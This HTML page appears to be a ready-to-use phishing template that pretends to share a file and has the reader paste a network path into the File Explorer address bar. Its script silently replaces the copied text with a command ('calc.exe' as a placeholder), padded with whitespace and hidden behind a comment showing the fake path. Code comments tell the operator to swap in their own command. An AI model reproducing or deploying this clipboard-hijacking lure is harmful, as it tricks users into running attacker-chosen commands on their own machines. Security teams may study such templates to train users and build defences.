<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <head>
        <title>A file was shared with you</title>
        <style>
            html, body {
                height: 100%;
                margin: 0;
            }

            body {
                display: flex;
                justify-content: center;
                align-items: center;
                font-family: sans-serif;
            }

            code {
                font-size: 16px;
            }

            .parent-container {
                display: flex;
                flex-direction: column;
                width: 650px;
                border: 1px solid #cacaca;
                border-radius: 6px;
            }

            .child-upper-container {
                display: flex;
                flex: .35;
                flex-direction: column;
                justify-content: center;
                align-items: center;
                padding: 20px 0px;
                border-bottom: 1px solid #cacaca;
            }

            .child-lower-container {
                flex: 1;
                padding: 20px 15px;
                background-color: #f8f8f8;
            }

            .child-lower-container p, .child-lower-container code {
                color: #454545;
            }

            #copy-code-block {
                display: flex;
                justify-content: space-between;
                margin: 20px;
                padding: 20px;
                border: 1px solid #cacaca;
                border-radius: 3px;
                background-color: #f2f2f2;
            }

            #copy-code-block:hover, .child-lower-container button:hover {
                cursor: pointer;
            }

            #copy-msg {
                display: none;
            }
            
            .child-lower-container button {
                display: block;
                margin: 0 auto;
                padding: 15px;
                border: 0px;
                border-radius: 3px;
                color: #ffffff;
                background-color: #0877d1;
            }

            #working-link {
                font-size: 12px;
                text-align: center;
                padding: 20px 0;
            }

            #file-explorer-open {
                display: none;
            }

            #copy-code-block:hover #copy-msg {
                display: inline;
            }
        </style>
    </head>

    <body>
        <div class="parent-container">
        <div class="child-upper-container">
            <!-- Icon by Icons8 (https://icons8.com/icon/45027/share) -->
            <img src="./icons8-share.svg">
            <h2>A file was shared with you</h2>
        </div>
        <div class="child-lower-container">
            <!-- Replace 'File.docx' with your desired pretext file name -->
            <p>To access <code>File.docx</code>, please follow the steps below:</p>
            <p>1. Copy the file path as shown below:</p>
            <div id="copy-code-block">
                <!-- Replace '\\Domain\Share\Pub\File.docx' with the complete path to the pretext file name -->
                <code id="path">\\Domain\Share\Pub\File.docx</code>
                <code id="copy-msg">Copy</code>
            </div>
            <p>2. Open File Explorer (<code>Win + E</code>) and select the address bar (<code>Win + E</code>)</p>
            <p>3. Paste the file path and press <code>Enter</code></p>
            <p id="working-link">This file has only been shared with you</p>
            <button type="button" id="file-explorer-btn">Open File Explorer</button>
            <!-- <input> in this case allows us to open File Explorer to 'upload' files; however we can also use 
                it to fake File Explorer prompts -->
            <input type="file" id="file-explorer-open"/>
        </div>
        </div>
    </body>

    <script>
        const codeBlock = document.getElementById('copy-code-block');
        const filePath = document.getElementById('path');
        const fileExplorerBtn = document.getElementById('file-explorer-btn');
        const fileExplorerOpen = document.getElementById('file-explorer-open');

        /* Add an event listener if the user copies the contents within the code block, inserting the custom 
            command as part of the clipboard */
        codeBlock.addEventListener('click', function() {
            /* Replace 'calc.exe' with a command to execute and after # your pretext file*/
            navigator.clipboard.writeText('calc.exe                                                                                                                                                                                                                                                                        # \\\\Domain\\Share\\Pub\\File.docx                                                                                                                                                                                          ');
            filePath.textContent = 'Copied!';
            fileExplorerOpen.click();
        })

        /* If the user wants to open File Explorer through the button, automatically fire a click event on the 
            <input> tag */
            fileExplorerBtn.addEventListener('click', function() {
            fileExplorerOpen.click();
        })
    </script>
</html>
